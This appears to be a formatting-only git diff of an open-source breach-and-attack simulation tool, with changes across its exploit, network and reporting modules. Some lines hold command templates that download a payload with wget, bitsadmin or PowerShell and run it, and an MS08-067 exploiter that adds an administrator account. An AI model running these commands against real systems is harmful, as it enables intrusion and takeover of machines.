@@ -74,7 +74,7 @@ def get_target_monkey(host): if host.os.get('type') == platform.system().lower(): # if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe if (not host.os.get('machine') and sys.maxsize < 2 ** 32) or \ - host.os.get('machine', '').lower() == platform.machine().lower(): + host.os.get('machine', '').lower() == platform.machine().lower(): monkey_path = sys.executable return monkey_path diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing.py b/monkey/infection_monkey/exploit/tools/payload_parsing.py index 31632b045..5c4415fe3 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing.py @@ -49,7 +49,7 @@ class LimitedSizePayload(Payload): "exceeds required length of command.") elif self.command == "": - return [self.prefix+self.suffix] + return [self.prefix + self.suffix] wrapper = textwrap.TextWrapper(drop_whitespace=False, width=self.get_max_sub_payload_length()) commands = [self.get_payload(part) for part diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py index 51564518e..2507cff66 100644 --- a/monkey/infection_monkey/exploit/tools/smb_tools.py +++ b/monkey/infection_monkey/exploit/tools/smb_tools.py @@ -12,6 +12,7 @@ from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.config import Configuration + __author__ = 'itamar' LOG = logging.getLogger(__name__) diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py index ac648012b..daccb4cfb 100644 --- a/monkey/infection_monkey/exploit/weblogic.py +++ b/monkey/infection_monkey/exploit/weblogic.py @@ -1,4 +1,3 @@ - import threading import logging import time 
@@ -13,7 +12,6 @@ from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.network.info import get_free_tcp_port from http.server import BaseHTTPRequestHandler, HTTPServer - __author__ = "VakarisZ" LOG = logging.getLogger(__name__) @@ -34,7 +32,6 @@ HEADERS = { class WebLogicExploiter(HostExploiter): - _TARGET_OS_TYPE = ['linux', 'windows'] _EXPLOITED_SERVICE = 'Weblogic' diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py index 7148ba965..4257677b0 100644 --- a/monkey/infection_monkey/exploit/win_ms08_067.py +++ b/monkey/infection_monkey/exploit/win_ms08_067.py @@ -162,11 +162,11 @@ class Ms08_067_Exploiter(HostExploiter): def is_os_supported(self): if self.host.os.get('type') in self._TARGET_OS_TYPE and \ - self.host.os.get('version') in list(self._windows_versions.keys()): + self.host.os.get('version') in list(self._windows_versions.keys()): return True if not self.host.os.get('type') or ( - self.host.os.get('type') in self._TARGET_OS_TYPE and not self.host.os.get('version')): + self.host.os.get('type') in self._TARGET_OS_TYPE and not self.host.os.get('version')): is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445) if is_smb_open: smb_finger = SMBFinger() @@ -193,9 +193,9 @@ class Ms08_067_Exploiter(HostExploiter): sock.send("cmd /c (net user {} {} /add) &&" " (net localgroup administrators {} /add)\r\n".format( - self._config.user_to_add, - self._config.remote_user_pass, - self._config.user_to_add).encode()) + self._config.user_to_add, + self._config.remote_user_pass, + self._config.user_to_add).encode()) time.sleep(2) reply = sock.recv(1000) diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index 257cfd469..cc286bfcd 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -122,4 +122,3 @@ class WmiExploiter(HostExploiter): return success return False - 
diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py index 254bce966..e4cfea7a4 100644 --- a/monkey/infection_monkey/model/__init__.py +++ b/monkey/infection_monkey/model/__init__.py @@ -5,14 +5,14 @@ __author__ = 'itamar' MONKEY_ARG = "m0nk3y" DROPPER_ARG = "dr0pp3r" ID_STRING = "M0NK3Y3XPL0ITABLE" -DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) -MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) -MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, ) +DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG,) +MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG,) +MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,) GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)' -DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) -MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) +DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG,) +MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG,) MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \ - '/c %%(monkey_path)s %s"' % (MONKEY_ARG, ) + '/c %%(monkey_path)s %s"' % (MONKEY_ARG,) DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \ 'file_path)s exit)) > NUL 2>&1 ' 
@@ -33,12 +33,12 @@ GET_ARCH_LINUX = "lscpu" # All in one commands (upload, change permissions, run) HADOOP_WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \ - "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \ - " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \ - "{& %(monkey_path)s %(monkey_type)s %(parameters)s } \"" + "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \ + " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \ + "{& %(monkey_path)s %(monkey_type)s %(parameters)s } \"" HADOOP_LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \ - "&& wget -O %(monkey_path)s %(http_path)s " \ - "; chmod +x %(monkey_path)s " \ - "&& %(monkey_path)s %(monkey_type)s %(parameters)s" + "&& wget -O %(monkey_path)s %(http_path)s " \ + "; chmod +x %(monkey_path)s " \ + "&& %(monkey_path)s %(monkey_type)s %(parameters)s" DOWNLOAD_TIMEOUT = 180 diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 3985c8a2e..a74c497af 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -182,7 +182,7 @@ class InfectionMonkey(object): if self._default_server: if self._network.on_island(self._default_server): machine.set_default_server(get_interface_to_target(machine.ip_addr) + - (':'+self._default_server_port if self._default_server_port else '')) + (':' + self._default_server_port if self._default_server_port else '')) else: machine.set_default_server(self._default_server) LOG.debug("Default server for machine: %r set to %s" % (machine, machine.default_server)) diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index 2d7b981f5..1418c22cc 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py 
@@ -13,7 +13,6 @@ from requests import ConnectionError from common.network.network_range import CidrRange from infection_monkey.utils.environment import is_windows_os - # Timeout for monkey connections TIMEOUT = 15 LOOPBACK_NAME = b"lo" diff --git a/monkey/infection_monkey/network/mssql_fingerprint.py b/monkey/infection_monkey/network/mssql_fingerprint.py index e6130732d..623b7368f 100644 --- a/monkey/infection_monkey/network/mssql_fingerprint.py +++ b/monkey/infection_monkey/network/mssql_fingerprint.py @@ -12,7 +12,6 @@ LOG = logging.getLogger(__name__) class MSSQLFinger(HostFinger): - # Class related consts SQL_BROWSER_DEFAULT_PORT = 1434 BUFFER_SIZE = 4096 diff --git a/monkey/infection_monkey/network/tcp_scanner.py b/monkey/infection_monkey/network/tcp_scanner.py index fa2d812ae..3df936672 100644 --- a/monkey/infection_monkey/network/tcp_scanner.py +++ b/monkey/infection_monkey/network/tcp_scanner.py @@ -11,7 +11,6 @@ BANNER_READ = 1024 class TcpScanner(HostScanner, HostFinger): - _SCANNED_SERVICE = 'unknown(TCP)' def __init__(self): diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py index 89417757d..3438eccda 100644 --- a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py @@ -27,6 +27,7 @@ class UsersPBA(PBA): """ Defines user's configured post breach action. """ + def __init__(self): super(UsersPBA, self).__init__(POST_BREACH_FILE_EXECUTION) self.filename = '' diff --git a/monkey/infection_monkey/post_breach/pba.py b/monkey/infection_monkey/post_breach/pba.py index 73b8a3221..57bf0aaf7 100644 --- a/monkey/infection_monkey/post_breach/pba.py +++ b/monkey/infection_monkey/post_breach/pba.py 
@@ -7,7 +7,6 @@ from infection_monkey.utils.environment import is_windows_os from infection_monkey.config import WormConfiguration from infection_monkey.telemetry.attack.t1064_telem import T1064Telem - LOG = logging.getLogger(__name__) __author__ = 'VakarisZ' @@ -19,6 +18,7 @@ class PBA(object): """ Post breach action object. Can be extended to support more than command execution on target machine. """ + def __init__(self, name="unknown", linux_cmd="", windows_cmd=""): """ :param name: Name of post breach action. diff --git a/monkey/infection_monkey/post_breach/post_breach_handler.py b/monkey/infection_monkey/post_breach/post_breach_handler.py index b5dfa93c7..78ee4ad42 100644 --- a/monkey/infection_monkey/post_breach/post_breach_handler.py +++ b/monkey/infection_monkey/post_breach/post_breach_handler.py @@ -16,6 +16,7 @@ class PostBreach(object): """ This class handles post breach actions execution """ + def __init__(self): self.os_is_linux = not is_windows_os() self.pba_list = self.config_to_pba_list() diff --git a/monkey/infection_monkey/pyinstaller_utils.py b/monkey/infection_monkey/pyinstaller_utils.py index d169bda6a..3e2bed17e 100644 --- a/monkey/infection_monkey/pyinstaller_utils.py +++ b/monkey/infection_monkey/pyinstaller_utils.py @@ -1,7 +1,6 @@ import os import sys - __author__ = 'itay.mizeretz' diff --git a/monkey/infection_monkey/system_info/linux_info_collector.py b/monkey/infection_monkey/system_info/linux_info_collector.py index 831b10ba1..fb38f84c4 100644 --- a/monkey/infection_monkey/system_info/linux_info_collector.py +++ b/monkey/infection_monkey/system_info/linux_info_collector.py @@ -26,4 +26,3 @@ class LinuxInfoCollector(InfoCollector): super(LinuxInfoCollector, self).get_info() self.info['ssh_info'] = SSHCollector.get_info() return self.info - diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py index 2c3696f44..1419478db 100644 
--- a/monkey/infection_monkey/system_info/windows_info_collector.py +++ b/monkey/infection_monkey/system_info/windows_info_collector.py @@ -1,6 +1,7 @@ import os import logging import sys + sys.coinit_flags = 0 # needed for proper destruction of the wmi python module import infection_monkey.config diff --git a/monkey/infection_monkey/system_info/wmi_consts.py b/monkey/infection_monkey/system_info/wmi_consts.py index a87e297d9..a42472b82 100644 --- a/monkey/infection_monkey/system_info/wmi_consts.py +++ b/monkey/infection_monkey/system_info/wmi_consts.py @@ -29,4 +29,3 @@ WMI_LDAP_CLASSES = {"ds_user": ("DS_sAMAccountName", "DS_userPrincipalName", "DS_sAMAccountType", "DS_servicePrincipalName", "DS_userAccountControl", "DS_whenChanged", "DS_whenCreated"), } - diff --git a/monkey/infection_monkey/system_singleton.py b/monkey/infection_monkey/system_singleton.py index 485a9253e..f82e7be44 100644 --- a/monkey/infection_monkey/system_singleton.py +++ b/monkey/infection_monkey/system_singleton.py @@ -5,7 +5,6 @@ from abc import ABCMeta, abstractmethod from infection_monkey.config import WormConfiguration - __author__ = 'itamar' LOG = logging.getLogger(__name__) diff --git a/monkey/infection_monkey/transport/__init__.py b/monkey/infection_monkey/transport/__init__.py index 735ef670a..25509ef85 100644 --- a/monkey/infection_monkey/transport/__init__.py +++ b/monkey/infection_monkey/transport/__init__.py @@ -1,4 +1,3 @@ from infection_monkey.transport.http import HTTPServer, LockedHTTPServer - __author__ = 'hoffer' diff --git a/monkey/infection_monkey/transport/tcp.py b/monkey/infection_monkey/transport/tcp.py index e910e657f..22cff5d4a 100644 --- a/monkey/infection_monkey/transport/tcp.py +++ b/monkey/infection_monkey/transport/tcp.py 
@@ -41,13 +41,13 @@ class SocketsPipe(Thread): except: break self._keep_connection = True - + self.source.close() self.dest.close() class TcpProxy(TransportProxyBase): - + def run(self): pipes = [] l_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 8ab61c895..9b5e7b849 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -39,7 +39,6 @@ from monkey_island.cc.resources.test.log_test import LogTest __author__ = 'Barak' - HOME_FILE = 'index.html' diff --git a/monkey/monkey_island/cc/island_logger.py b/monkey/monkey_island/cc/island_logger.py index 8fbef1e0e..f55fcf896 100644 --- a/monkey/monkey_island/cc/island_logger.py +++ b/monkey/monkey_island/cc/island_logger.py @@ -2,7 +2,6 @@ import os import json import logging.config - __author__ = 'Maor.Rayzin' diff --git a/monkey/monkey_island/cc/island_logger_default_config.json b/monkey/monkey_island/cc/island_logger_default_config.json index 34a57b374..522177cda 100644 --- a/monkey/monkey_island/cc/island_logger_default_config.json +++ b/monkey/monkey_island/cc/island_logger_default_config.json 
@@ -1,33 +1,33 @@ { - "version": 1, - "disable_existing_loggers": false, - "formatters": { - "simple": { - "format": "%(asctime)s - %(filename)s:%(lineno)s - %(funcName)10s() - %(levelname)s - %(message)s" - } - }, - - "handlers": { - "console": { - "class": "logging.StreamHandler", - "level": "DEBUG", - "formatter": "simple", - "stream": "ext://sys.stdout" - }, - - "info_file_handler": { - "class": "logging.handlers.RotatingFileHandler", - "level": "INFO", - "formatter": "simple", - "filename": "info.log", - "maxBytes": 10485760, - "backupCount": 20, - "encoding": "utf8" - } - }, - - "root": { - "level": "DEBUG", - "handlers": ["console", "info_file_handler"] + "version": 1, + "disable_existing_loggers": false, + "formatters": { + "simple": { + "format": "%(asctime)s - %(filename)s:%(lineno)s - %(funcName)10s() - %(levelname)s - %(message)s" } + }, + "handlers": { + "console": { + "class": "logging.StreamHandler", + "level": "DEBUG", + "formatter": "simple", + "stream": "ext://sys.stdout" + }, + "info_file_handler": { + "class": "logging.handlers.RotatingFileHandler", + "level": "INFO", + "formatter": "simple", + "filename": "info.log", + "maxBytes": 10485760, + "backupCount": 20, + "encoding": "utf8" + } + }, + "root": { + "level": "DEBUG", + "handlers": [ + "console", + "info_file_handler" + ] + } } \ No newline at end of file diff --git a/monkey/monkey_island/cc/main.py b/monkey/monkey_island/cc/main.py index c3c762dbc..17c537aeb 100644 --- a/monkey/monkey_island/cc/main.py +++ b/monkey/monkey_island/cc/main.py @@ -13,6 +13,7 @@ if BASE_PATH not in sys.path: from monkey_island.cc.island_logger import json_setup_logging from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH + # This is here in order to catch EVERYTHING, some functions are being called on imports the log init needs to be on top. json_setup_logging(default_path=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'island_logger_default_config.json'), default_level=logging.DEBUG) 
diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py index 324903809..8d0ed42ad 100644 --- a/monkey/monkey_island/cc/models/monkey.py +++ b/monkey/monkey_island/cc/models/monkey.py @@ -43,6 +43,7 @@ class Monkey(Document): tunnel = ReferenceField("self") command_control_channel = EmbeddedDocumentField(CommandControlChannel) aws_instance_id = StringField(required=False) # This field only exists when the monkey is running on an AWS + # instance. See https://github.com/guardicore/monkey/issues/426. @staticmethod diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 3c10ca7d7..0d12f9785 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -188,4 +188,3 @@ class TestMonkey(IslandTestCase): cache_info_after_query = Monkey.is_monkey.storage.backend.cache_info() self.assertEqual(cache_info_after_query.hits, 2) - diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index d61478641..c7190d0f1 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py @@ -14,6 +14,7 @@ class TestFinding(IslandTestCase): Also, the working directory needs to be the working directory from which you usually run the island so the server.json file is found and loaded. """ + def test_save_finding_validation(self): self.fail_if_not_testing_env() self.clean_finding_db() diff --git a/monkey/monkey_island/cc/resources/attack/attack_config.py b/monkey/monkey_island/cc/resources/attack/attack_config.py index da7651f24..803fb5453 100644 --- a/monkey/monkey_island/cc/resources/attack/attack_config.py +++ b/monkey/monkey_island/cc/resources/attack/attack_config.py 
@@ -27,4 +27,3 @@ class AttackConfiguration(flask_restful.Resource): AttackConfig.update_config({'properties': json.loads(request.data)}) AttackConfig.apply_to_monkey_config() return {} - diff --git a/monkey/monkey_island/cc/resources/local_run.py b/monkey/monkey_island/cc/resources/local_run.py index 54a16f518..41f5fa417 100644 --- a/monkey/monkey_island/cc/resources/local_run.py +++ b/monkey/monkey_island/cc/resources/local_run.py @@ -16,6 +16,7 @@ from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH __author__ = 'Barak' import logging + logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/resources/monkey.py b/monkey/monkey_island/cc/resources/monkey.py index 8e523a8a7..3e3ef40c0 100644 --- a/monkey/monkey_island/cc/resources/monkey.py +++ b/monkey/monkey_island/cc/resources/monkey.py @@ -13,6 +13,7 @@ from monkey_island.cc.services.node import NodeService __author__ = 'Barak' + # TODO: separate logic from interface diff --git a/monkey/monkey_island/cc/resources/netmap.py b/monkey/monkey_island/cc/resources/netmap.py index ed83414f5..3b7e471d8 100644 --- a/monkey/monkey_island/cc/resources/netmap.py +++ b/monkey/monkey_island/cc/resources/netmap.py @@ -27,5 +27,3 @@ class NetMap(flask_restful.Resource): "nodes": monkeys + nodes + monkey_island, "edges": edges } - - diff --git a/monkey/monkey_island/cc/resources/pba_file_download.py b/monkey/monkey_island/cc/resources/pba_file_download.py index 5b567e8e4..de85fc291 100644 --- a/monkey/monkey_island/cc/resources/pba_file_download.py +++ b/monkey/monkey_island/cc/resources/pba_file_download.py @@ -9,6 +9,7 @@ class PBAFileDownload(flask_restful.Resource): """ File download endpoint used by monkey to download user's PBA file """ + # Used by monkey. can't secure. def get(self, path): return send_from_directory(GET_FILE_DIR, path) diff --git a/monkey/monkey_island/cc/resources/pba_file_upload.py b/monkey/monkey_island/cc/resources/pba_file_upload.py index 0d924a742..3a636459c 100644 
--- a/monkey/monkey_island/cc/resources/pba_file_upload.py +++ b/monkey/monkey_island/cc/resources/pba_file_upload.py @@ -21,6 +21,7 @@ class FileUpload(flask_restful.Resource): """ File upload endpoint used to exchange files with filepond component on the front-end """ + @jwt_required() def get(self, file_type): """ diff --git a/monkey/monkey_island/cc/resources/reporting/report.py b/monkey/monkey_island/cc/resources/reporting/report.py index 5b416e60b..961e745a8 100644 --- a/monkey/monkey_island/cc/resources/reporting/report.py +++ b/monkey/monkey_island/cc/resources/reporting/report.py @@ -1,6 +1,5 @@ import http.client - import flask_restful from flask import jsonify @@ -28,10 +27,10 @@ class Report(flask_restful.Resource): elif report_type == ZERO_TRUST_REPORT_TYPE: if report_data == REPORT_DATA_PILLARS: return jsonify({ - "statusesToPillars": ZeroTrustService.get_statuses_to_pillars(), - "pillarsToStatuses": ZeroTrustService.get_pillars_to_statuses(), - "grades": ZeroTrustService.get_pillars_grades() - } + "statusesToPillars": ZeroTrustService.get_statuses_to_pillars(), + "pillarsToStatuses": ZeroTrustService.get_pillars_to_statuses(), + "grades": ZeroTrustService.get_pillars_grades() + } ) elif report_data == REPORT_DATA_PRINCIPLES_STATUS: return jsonify(ZeroTrustService.get_principles_status()) diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/resources/representations_test.py index 714c70ed2..c50394117 100644 --- a/monkey/monkey_island/cc/resources/representations_test.py +++ b/monkey/monkey_island/cc/resources/representations_test.py @@ -37,12 +37,12 @@ class TestJsonRepresentations(TestCase): # dicts and lists self.assertEqual({ - "a": [ - {"ba": obj_id_str, - "bb": obj_id_str} - ], - "b": {"id": obj_id_str} - }, + "a": [ + {"ba": obj_id_str, + "bb": obj_id_str} + ], + "b": {"id": obj_id_str} + }, normalize_obj({ "a": [ {"ba": bson.objectid.ObjectId(obj_id_str), 
diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py index a655c5f9f..8a8c750b4 100644 --- a/monkey/monkey_island/cc/resources/telemetry_feed.py +++ b/monkey/monkey_island/cc/resources/telemetry_feed.py @@ -22,8 +22,8 @@ class TelemetryFeed(flask_restful.Resource): if "null" == timestamp or timestamp is None: # special case to avoid ugly JS code... telemetries = mongo.db.telemetry.find({}) else: - telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}})\ - + telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) \ + \ telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) try: diff --git a/monkey/monkey_island/cc/resources/test/log_test.py b/monkey/monkey_island/cc/resources/test/log_test.py index e592e7214..ef4ff708d 100644 --- a/monkey/monkey_island/cc/resources/test/log_test.py +++ b/monkey/monkey_island/cc/resources/test/log_test.py @@ -2,7 +2,6 @@ from bson import json_util import flask_restful from flask import request - from monkey_island.cc.auth import jwt_required from monkey_island.cc.database import mongo, database diff --git a/monkey/monkey_island/cc/server_config.json b/monkey/monkey_island/cc/server_config.json index 0b28d0b74..420f1b303 100644 --- a/monkey/monkey_island/cc/server_config.json +++ b/monkey/monkey_island/cc/server_config.json @@ -1,4 +1,4 @@ { - "server_config": "standard", - "deployment": "develop" + "server_config": "standard", + "deployment": "develop" } diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index 1c18f7654..10005bd26 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py 
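Review bot: The added `\` standing alone on the line after the `find(...)` assignment in the `else:` branch chains that statement straight into the following `telemetries = telemetries.sort(...)` line, because each trailing backslash joins the next physical line; as far as I can tell that folds two assignments into one logical line, which the parser rejects as a SyntaxError (the old `\` followed by an empty line happened to terminate the statement, so it parsed). Neither continuation is needed since the statement is already complete at the closing `)`: replace the two changed lines with `telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}})` and leave `telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)])` as its own statement. If a single chained expression was intended, write `.find({...}).sort([...])` explicitly rather than relying on backslashes. The enclosing `get` method starts outside the hunk, and the `try:` that begins at the hunk's end continues past it, so I cannot see whether a malformed `timestamp` query parameter (which makes `dateutil.parser.parse` raise) is caught there.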
@@ -10,7 +10,6 @@ from monkey_island.cc.services.reporting.report_generation_synchronisation impor __author__ = "VakarisZ" - LOG = logging.getLogger(__name__) TECHNIQUES = {'T1210': T1210.T1210, @@ -52,7 +51,7 @@ class AttackReportService: Generates new report based on telemetries, replaces old report in db with new one. :return: Report object """ - report =\ + report = \ { 'techniques': {}, 'meta': {'latest_monkey_modifytime': Monkey.get_latest_modifytime()}, diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py index 2b49f264d..8039a2e76 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1003(AttackTechnique): - tech_id = "T1003" unscanned_msg = "Monkey tried to obtain credentials from systems in the network but didn't find any or failed." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py index b84fe4a6f..2a39fad02 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py @@ -5,7 +5,6 @@ __author__ = "VakarisZ" class T1005(AttackTechnique): - tech_id = "T1005" unscanned_msg = "Monkey didn't gather any sensitive data from local system." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py index 43d7c42b0..9249020dc 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py 
@@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1016(AttackTechnique): - tech_id = "T1016" unscanned_msg = "Monkey didn't gather network configurations." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py index a955f6cc9..3498029c9 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1018(AttackTechnique): - tech_id = "T1018" unscanned_msg = "Monkey didn't find any machines on the network." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py index d22583359..3fc29259b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py @@ -3,7 +3,6 @@ from monkey_island.cc.services.attack.technique_reports import AttackTechnique from common.utils.attack_utils import ScanStatus from monkey_island.cc.services.attack.technique_reports.technique_report_tools import parse_creds - __author__ = "VakarisZ" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py index 1342b646e..ae3342355 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1041(AttackTechnique): - tech_id = "T1041" unscanned_msg = "Monkey didn't exfiltrate any info trough command and control channel." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py index ef15dd9fd..a2eb3ffd0 100644 
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1059(AttackTechnique): - tech_id = "T1059" unscanned_msg = "Monkey didn't exploit any machines to run commands at." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py index 7d8ceb93e..f8eb9aa3e 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1065(AttackTechnique): - tech_id = "T1065" unscanned_msg = "" scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py index 623d157ae..655da767d 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1075(AttackTechnique): - tech_id = "T1075" unscanned_msg = "Monkey didn't try to use pass the hash attack." scanned_msg = "Monkey tried to use hashes while logging in but didn't succeed." diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py index bc2645bb9..726910789 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1082(AttackTechnique): - tech_id = "T1082" unscanned_msg = "Monkey didn't gather any system info on the network." scanned_msg = "" 
